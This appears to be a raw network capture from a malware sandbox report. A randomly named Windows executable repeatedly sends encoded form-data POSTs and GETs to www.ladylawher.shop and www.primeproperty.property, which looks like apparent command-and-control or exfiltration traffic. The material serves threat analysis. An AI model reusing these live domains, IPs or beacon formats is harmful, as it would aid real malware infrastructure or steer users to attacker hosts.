                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                      Nov 13, 2024 09:28:03.628504992 CET | 548 bytes | IN | HTTP/1.1 404 Not Found
                                                                                      Date: Wed, 13 Nov 2024 08:28:03 GMT
                                                                                      Server: Apache
                                                                                      Content-Length: 389
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                      Session ID: 21 | Source: 192.168.2.4:59102 | Destination: 3.33.130.190:80 | PID: 2800 | Process: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Nov 13, 2024 09:28:08.706906080 CET | 795 bytes | OUT | POST /i4bc/ HTTP/1.1
                                                                                      Host: www.ladylawher.shop
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Origin: http://www.ladylawher.shop
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Length: 199
                                                                                      Referer: http://www.ladylawher.shop/i4bc/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                      Data Raw: 72 50 3d 43 35 30 4f 58 39 4a 46 56 4e 41 66 4b 38 62 52 75 5a 32 70 35 6c 67 50 78 39 30 63 48 31 4b 67 63 4c 2f 7a 63 6e 34 73 55 65 53 69 6e 4a 43 5a 69 48 73 42 30 78 56 41 6d 32 74 50 2f 46 36 38 45 31 45 32 4e 52 37 5a 4e 64 65 59 44 38 2b 59 53 5a 4b 68 6b 55 64 48 48 6e 58 4e 36 6f 31 32 52 44 78 45 33 51 75 42 35 4f 74 62 6d 30 72 43 58 4b 4e 2f 48 55 55 53 4f 62 64 44 2b 47 47 78 38 73 66 6b 67 51 45 7a 7a 47 49 32 6f 6c 58 50 64 7a 34 73 36 68 63 76 68 47 52 53 47 4f 73 69 34 54 74 43 74 6a 42 59 6c 65 79 76 59 56 42 7a 6e 44 37 58 53 38 79 4a 56 41 2f 68 33 39 31 77 6d 41 3d 3d
                                                                                      Data Ascii: rP=C50OX9JFVNAfK8bRuZ2p5lgPx90cH1KgcL/zcn4sUeSinJCZiHsB0xVAm2tP/F68E1E2NR7ZNdeYD8+YSZKhkUdHHnXN6o12RDxE3QuB5Otbm0rCXKN/HUUSObdD+GGx8sfkgQEzzGI2olXPdz4s6hcvhGRSGOsi4TtCtjBYleyvYVBznD7XS8yJVA/h391wmA==


                                                                                      Session ID: 22 | Source: 192.168.2.4:59103 | Destination: 3.33.130.190:80 | PID: 2800 | Process: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Nov 13, 2024 09:28:11.254400015 CET | 815 bytes | OUT | POST /i4bc/ HTTP/1.1
                                                                                      Host: www.ladylawher.shop
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Origin: http://www.ladylawher.shop
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Length: 219
                                                                                      Referer: http://www.ladylawher.shop/i4bc/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                      Data Raw: 72 50 3d 43 35 30 4f 58 39 4a 46 56 4e 41 66 4b 64 4c 52 69 65 43 70 6f 31 67 4d 76 74 30 63 4a 56 4b 6b 63 4c 7a 7a 63 69 41 47 55 49 43 69 6e 72 71 5a 6a 46 45 42 78 78 56 41 2b 47 74 47 37 46 36 6e 45 31 49 51 4e 52 48 5a 4e 64 61 59 44 39 4f 59 53 71 53 69 6c 45 64 46 4b 48 58 50 30 49 31 32 52 44 78 45 33 51 71 37 35 4f 6c 62 6d 46 37 43 58 76 74 77 4a 30 55 54 5a 72 64 44 36 47 47 31 38 73 66 47 67 54 41 5a 7a 45 77 32 6f 68 54 50 64 48 6b 74 77 68 63 6c 76 6d 51 74 56 4e 39 54 34 52 49 55 6b 53 5a 44 6a 64 4f 4c 55 7a 4d 70 32 79 61 41 41 38 57 36 49 48 32 56 36 2b 49 35 39 49 74 63 58 6b 35 74 79 4d 51 63 6d 55 52 66 49 4d 57 32 64 30 6b 3d
                                                                                      Data Ascii: rP=C50OX9JFVNAfKdLRieCpo1gMvt0cJVKkcLzzciAGUICinrqZjFEBxxVA+GtG7F6nE1IQNRHZNdaYD9OYSqSilEdFKHXP0I12RDxE3Qq75OlbmF7CXvtwJ0UTZrdD6GG18sfGgTAZzEw2ohTPdHktwhclvmQtVN9T4RIUkSZDjdOLUzMp2yaAA8W6IH2V6+I59ItcXk5tyMQcmURfIMW2d0k=


                                                                                      Session ID: 23 | Source: 192.168.2.4:59104 | Destination: 3.33.130.190:80 | PID: 2800 | Process: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Nov 13, 2024 09:28:13.799452066 CET | 10897 bytes | OUT | POST /i4bc/ HTTP/1.1
                                                                                      Host: www.ladylawher.shop
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Origin: http://www.ladylawher.shop
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Length: 10299
                                                                                      Referer: http://www.ladylawher.shop/i4bc/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                      Data Raw: 72 50 3d 43 35 30 4f 58 39 4a 46 56 4e 41 66 4b 64 4c 52 69 65 43 70 6f 31 67 4d 76 74 30 63 4a 56 4b 6b 63 4c 7a 7a 63 69 41 47 55 49 4b 69 6e 36 4b 5a 6a 6b 45 42 32 78 56 41 7a 6d 74 44 37 46 36 6d 45 31 51 63 4e 52 4c 6e 4e 66 79 59 44 62 36 59 51 62 53 69 73 45 64 46 57 33 58 4b 36 6f 30 73 52 44 42 41 33 51 36 37 35 4f 6c 62 6d 47 7a 43 52 36 4e 77 4c 30 55 53 4f 62 64 50 2b 47 47 4a 38 73 58 38 67 53 30 6a 79 33 34 32 6f 42 44 50 47 53 34 74 79 42 63 72 36 6d 51 31 56 4e 78 49 34 52 55 75 6b 53 39 39 6a 61 6d 4c 58 6c 56 42 6a 6a 4b 50 58 4f 36 58 63 51 4f 74 31 64 73 30 6b 34 68 47 47 55 78 46 79 64 6f 30 69 54 78 62 50 38 36 53 42 42 4c 4f 39 72 68 44 78 50 6c 47 2b 78 52 2f 6a 4d 44 4e 55 6e 64 58 63 37 51 77 39 77 2b 44 63 59 4f 33 59 47 70 68 6a 55 64 48 57 38 42 2b 68 58 6d 63 79 30 30 39 66 42 44 43 51 56 65 62 39 33 51 36 63 54 76 58 6e 41 6c 38 73 76 4b 6f 38 55 62 30 42 4a 37 64 62 6f 43 70 32 64 71 4e 47 51 53 4f 6c 69 45 50 30 2f 2b 32 78 63 56 32 78 6e 4f 53 62 2b 66 38 68 73 4d [TRUNCATED]
                                                                                      Data Ascii: rP=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 [TRUNCATED]


                                                                                      Session ID: 24 | Source: 192.168.2.4:59105 | Destination: 3.33.130.190:80 | PID: 2800 | Process: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Nov 13, 2024 09:28:17.199978113 CET | 529 bytes | OUT | GET /i4bc/?rP=P7cuULF9RNNpbZDPqOSIjiALg+sZAwaoAqjHQXQRXIOUhYGrthov5xR31GNCxCywGXd8BQaSBdu7etG1CrfHuWVBHlP07YMsKwlH7wrGl8lSs0vEOZdyfzQ=&2p2h=vzYT2lDhJTZ0Ql HTTP/1.1
                                                                                      Host: www.ladylawher.shop
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                      Nov 13, 2024 09:28:17.826349974 CET | 398 bytes | IN | HTTP/1.1 200 OK
                                                                                      Server: openresty
                                                                                      Date: Wed, 13 Nov 2024 08:28:17 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 258
                                                                                      Connection: close
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 72 50 3d 50 37 63 75 55 4c 46 39 52 4e 4e 70 62 5a 44 50 71 4f 53 49 6a 69 41 4c 67 2b 73 5a 41 77 61 6f 41 71 6a 48 51 58 51 52 58 49 4f 55 68 59 47 72 74 68 6f 76 35 78 52 33 31 47 4e 43 78 43 79 77 47 58 64 38 42 51 61 53 42 64 75 37 65 74 47 31 43 72 66 48 75 57 56 42 48 6c 50 30 37 59 4d 73 4b 77 6c 48 37 77 72 47 6c 38 6c 53 73 30 76 45 4f 5a 64 79 66 7a 51 3d 26 32 70 32 68 3d 76 7a 59 54 32 6c 44 68 4a 54 5a 30 51 6c 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?rP=P7cuULF9RNNpbZDPqOSIjiALg+sZAwaoAqjHQXQRXIOUhYGrthov5xR31GNCxCywGXd8BQaSBdu7etG1CrfHuWVBHlP07YMsKwlH7wrGl8lSs0vEOZdyfzQ=&2p2h=vzYT2lDhJTZ0Ql"}</script></head></html>


                                                                                      Session ID: 25 | Source: 192.168.2.4:59106 | Destination: 113.20.119.31:80 | PID: 2800 | Process: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Nov 13, 2024 09:28:22.883877039 CET | 816 bytes | OUT | POST /c1ti/ HTTP/1.1
                                                                                      Host: www.primeproperty.property
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Origin: http://www.primeproperty.property
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Length: 199
                                                                                      Referer: http://www.primeproperty.property/c1ti/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                      Data Raw: 72 50 3d 5a 55 39 70 6a 4a 54 4d 7a 61 68 70 68 72 48 51 31 5a 70 47 37 63 77 54 64 31 66 66 33 66 35 44 54 62 73 46 33 65 55 71 4e 67 4e 4c 30 78 35 63 59 7a 4f 64 76 35 52 4e 73 6b 30 45 2b 58 52 30 6b 2f 48 7a 41 72 71 4c 6c 58 79 34 65 72 55 64 47 73 67 59 33 7a 6f 77 69 72 33 48 62 6b 71 50 78 70 45 5a 76 4e 36 67 71 52 37 64 70 69 32 51 72 47 44 6e 36 7a 57 55 6b 2f 42 66 49 41 6a 73 49 73 46 70 39 65 7a 46 72 33 31 49 6c 37 4e 67 76 73 73 7a 56 57 41 39 58 66 44 45 54 34 53 35 73 34 53 58 48 65 54 6c 5a 55 57 69 67 57 67 69 4b 4e 42 48 71 32 58 33 49 4a 76 46 43 36 35 52 31 51 3d 3d
                                                                                      Data Ascii: rP=ZU9pjJTMzahphrHQ1ZpG7cwTd1ff3f5DTbsF3eUqNgNL0x5cYzOdv5RNsk0E+XR0k/HzArqLlXy4erUdGsgY3zowir3HbkqPxpEZvN6gqR7dpi2QrGDn6zWUk/BfIAjsIsFp9ezFr31Il7NgvsszVWA9XfDET4S5s4SXHeTlZUWigWgiKNBHq2X3IJvFC65R1Q==
                                                                                      Nov 13, 2024 09:28:23.952790022 CET | 717 bytes | IN | HTTP/1.1 404 Not Found
                                                                                      Server: openresty/1.25.3.2
                                                                                      Date: Wed, 13 Nov 2024 08:28:23 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 561
                                                                                      Connection: close
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 35 2e 33 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 [TRUNCATED]
                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.25.3.2</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->


                                                                                      Session ID: 26 | Source: 192.168.2.4:59107 | Destination: 113.20.119.31:80 | PID: 2800 | Process: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Nov 13, 2024 09:28:25.425424099 CET | 836 bytes | OUT | POST /c1ti/ HTTP/1.1
                                                                                      Host: www.primeproperty.property
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Origin: http://www.primeproperty.property
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Length: 219
                                                                                      Referer: http://www.primeproperty.property/c1ti/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                      Data Raw: 72 50 3d 5a 55 39 70 6a 4a 54 4d 7a 61 68 70 75 72 33 51 79 34 70 47 2b 38 77 51 53 56 66 66 35 50 35 48 54 61 51 46 33 66 67 36 4e 53 5a 4c 30 51 4a 63 62 33 36 64 69 5a 52 4e 6a 45 30 64 77 33 52 2f 6b 2f 4b 4d 41 71 47 4c 6c 58 6d 34 65 71 6b 64 47 2f 34 66 31 6a 6f 2b 72 4c 33 4a 45 30 71 50 78 70 45 5a 76 4e 75 4f 71 52 6a 64 75 53 6d 51 72 69 58 6b 30 54 57 62 6a 2f 42 66 4d 41 6a 6f 49 73 46 66 39 62 72 2f 72 78 78 49 6c 36 64 67 76 5a 59 30 41 6d 41 2f 59 2f 43 4a 61 4b 37 4f 6c 6f 58 32 4f 4d 7a 35 45 41 69 57 6f 77 74 34 62 38 67 51 34 32 7a 45 56 4f 6d 78 50 35 45 59 75 56 57 35 4e 36 39 69 2f 5a 61 77 73 6b 65 4c 42 52 41 57 69 69 59 3d
                                                                                      Data Ascii: rP=ZU9pjJTMzahpur3Qy4pG+8wQSVff5P5HTaQF3fg6NSZL0QJcb36diZRNjE0dw3R/k/KMAqGLlXm4eqkdG/4f1jo+rL3JE0qPxpEZvNuOqRjduSmQriXk0TWbj/BfMAjoIsFf9br/rxxIl6dgvZY0AmA/Y/CJaK7OloX2OMz5EAiWowt4b8gQ42zEVOmxP5EYuVW5N69i/ZawskeLBRAWiiY=
                                                                                      Nov 13, 2024 09:28:26.498707056 CET | 717 bytes | IN | HTTP/1.1 404 Not Found
                                                                                      Server: openresty/1.25.3.2
                                                                                      Date: Wed, 13 Nov 2024 08:28:26 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 561
                                                                                      Connection: close
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 35 2e 33 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 [TRUNCATED]
                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.25.3.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      27 | 192.168.2.4 | 59108 | 113.20.119.31 | 80 | 2800 | C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Nov 13, 2024 09:28:27.977755070 CET | 10918 | OUT | POST /c1ti/ HTTP/1.1
                                                                                      Host: www.primeproperty.property
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Origin: http://www.primeproperty.property
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Length: 10299
                                                                                      Referer: http://www.primeproperty.property/c1ti/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                      Data Raw: 72 50 3d 5a 55 39 70 6a 4a 54 4d 7a 61 68 70 75 72 33 51 79 34 70 47 2b 38 77 51 53 56 66 66 35 50 35 48 54 61 51 46 33 66 67 36 4e 53 42 4c 30 69 52 63 5a 57 36 64 6a 5a 52 4e 71 6b 30 41 77 33 52 59 6b 37 75 49 41 72 36 39 6c 56 65 34 59 4a 73 64 54 36 4d 66 2f 6a 6f 2b 30 62 33 45 62 6b 71 57 78 70 55 56 76 4e 2b 4f 71 52 6a 64 75 51 75 51 73 32 44 6b 32 54 57 55 6b 2f 42 44 49 41 6a 51 49 73 64 50 39 62 66 76 6f 42 52 49 67 72 74 67 38 62 41 30 63 32 41 78 55 66 44 61 61 4b 6e 52 6c 6f 4c 63 4f 49 37 44 45 48 4b 57 71 6c 51 2f 47 49 74 4f 76 55 6a 4b 4f 75 71 38 41 75 77 76 6e 69 6d 54 4d 62 68 70 72 4b 71 6b 32 47 37 68 59 51 49 53 31 56 41 76 57 48 4a 41 36 4b 54 34 57 37 65 62 31 59 30 49 64 69 50 6f 55 46 35 4c 6d 74 2f 41 4e 75 4c 42 68 61 6d 6c 33 62 52 57 31 75 79 58 4e 59 37 32 62 59 75 49 77 79 58 69 74 77 31 75 44 68 6e 4e 77 47 50 7a 44 4c 61 41 53 37 59 36 58 55 73 67 56 75 30 6e 74 63 47 63 56 79 4c 36 46 62 36 69 4b 6e 56 69 5a 78 6b 43 54 63 4e 4b 4b 50 54 43 72 2f 46 70 32 67 49 [TRUNCATED]
                                                                                      Nov 13, 2024 09:28:29.091928959 CET | 717 | IN | HTTP/1.1 404 Not Found
                                                                                      Server: openresty/1.25.3.2
                                                                                      Date: Wed, 13 Nov 2024 08:28:28 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 561
                                                                                      Connection: close
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 35 2e 33 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 [TRUNCATED]
                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.25.3.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      28 | 192.168.2.4 | 59109 | 113.20.119.31 | 80 | 2800 | C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Nov 13, 2024 09:28:30.516690016 CET | 536 | OUT | GET /c1ti/?rP=UWVJg+rBkYQ16c/k/c5G2tAQQlKC6rNVaa0x99kOYGF7jBYWQyWqu7Abjh8I3w9fm9z6F4PdgXfZGbhZEsJH8R4Ck+TUDnCQl4oBl/L9phTMmBOgy1HwiRs=&2p2h=vzYT2lDhJTZ0Ql HTTP/1.1
                                                                                      Host: www.primeproperty.property
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
